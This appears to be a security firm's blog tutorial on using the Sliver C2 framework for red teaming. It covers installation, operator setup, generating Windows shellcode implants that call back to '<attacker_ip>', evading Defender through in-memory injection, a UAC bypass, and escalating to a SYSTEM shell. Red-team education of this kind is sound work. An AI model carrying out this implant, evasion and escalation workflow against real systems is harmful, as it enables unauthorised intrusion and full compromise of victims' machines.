Numen

Looking for the ‘Sliver’ lining — Getting System Shell with Sliver C2

Less travelled road is for the curious and courageous ones. That’s the driver to the incubation of this idea — Getting System Shell using Sliver C2. As defences against attack have improved over time, hackers increasingly adopting Sliver C2 framework as alternative attack tool. Apparently, there are not many resources available out there about Sliver yet. We believe this will be a great help to those who are starting out and looking for more guided steps. So, let’s have some fun with Sliver!

Installation of Sliver Server and Client

In this example, we run the C2 server and client on Linux environments.

One-liner Linux install script:

curl https://sliver.sh/install|sudo bash

Then, run sliver to start the server console.

Sliver-Client (Operator):

Download the latest client binary from https://github.com/BishopFox/sliver/releases

Setting Up Multi-player Sliver

In larger-scale red teaming collaboration engagements, we can have multiple operators (players) simultaneously connect to the same Sliver server, commanding a sliver army.

The easiest way to set up a server for multiplayer is to use the one-liner install script stated above, which will configure the server as a systemd service.

Operators and servers connection authenticate using Mutual TLS and all the certificates are managed automatically by Sliver.

Generate a new operator configuration file using the sliver-server binary that by default placed in /root

./sliver-server operator — name numenplayer1 — lhost 192.168.81.135 — save numenplayer1.cfg
Figure 1: Generating Player Configuration File

Next, copy the operator’s configuration (.cfg) file to the operator’s machine.

At the sliver-client machine, we run the command to import the configuration file and then run the sliver-client binary to connect to the server.

Figure 2: Importing Config file and Connecting to Server

Over at the Sliver server console, we will see the new operator has joined in.

Figure 3: Showing the Online Operators Generating Implants

Sliver implants support two modes of operation: “beacon mode” and “session mode.” In this example, we generate a session implant shellcode. The shellcode binary will be saved into the specified directory.

Generating Implants

Sliver implants support two modes of operation: “beacon mode” and “session mode.” In this example, we generate a session implant shellcode. The shellcode binary will be saved into the specified directory.

generate — mtls <attacker_ip> — save /tmp — skip-symbols -f shellcode — os windows
Figure 4: Generating Implant in the form of Shellcode

Figure 4: Generating Implant in the form of Shellcode In order to execute the shellcode without it being killed by Windows Defender, we have created a payload written in Golang language that performs the following:

  • Download the Sliver implant shellcode
  • Inject and execute in memory

*We will share the code in the next article 🙂

Getting Shell and Interacting with Sessions

Before you can catch a shell, start an mTLS listener to support the callbacks.

Figure 5: Starting the Listener

Serve up a Python file server for the shellcode download. The custom Go-based payload was executed on the compromised system. Now, it’s time for the thrill – we got a shell!

Figure 6: Executing the Custom Go-based Payload

To interact with the callback session, we can run the command:

sessions -i <session_id>
use <session_id>
Figure 7: Getting Callback Session
Figure 8: Help Listing

Before we carry out post-exploitation steps, we can run any recon scripts of your choice using Sliver built-in command execute-assembly.

Figure 9: Running Recon Script

Run getprivs command to confirm the integrity level of the account.

Figure 10: Running getprivs command showing Medium Integrity Level

Post-Exploitation: Getting Elevated and System Session

Our final objective is to open a SYSTEM shell. In order to achieve that, we first need to obtain an elevated Sliver session. This is where bypassing User Account Control (UAC) comes into play.

We will upload a UAC bypass binary into the compromised system, which is an intel recipe developed by Numen researcher.

Figure 11: Uploading UAC bypass Exploit

Next, execute the Sliver implant to spawn a new Sliver elevated session.

Figure 12: Execute UAC bypass Exploit to get Elevated Session

Let’s check if the new session was running in elevated process, so we run the getprivsagain.

Figure 13: Checking the Elevated Session

Now, run getsystemcommand to spawn a new session running as NT AUTHORITY\SYSTEM. Voila!

Figure 14: Getting SYSTEM session

Wrapping Up

In recent months, Sliver emerges as Cobalt Strike alternative for malicious C2, integrating the Sliver commands giving threat actors increased level of chance to evade automated security detections.

In the coming weeks, we will be releasing an article on real-world red teaming engagement scenarios using Sliver C2, including the codes to bypass Defender.

Numen Cyber Labs is committed to facilitating the safe development of Web 3.0. We are dedicated to the security of the blockchain ecosystem, as well as operating systems & browser/mobile security. We regularly disseminate analyses on topics such as these, please stay tuned or visit our blog here for more!

This blog was originally published on our Medium Account.

Share:

More Posts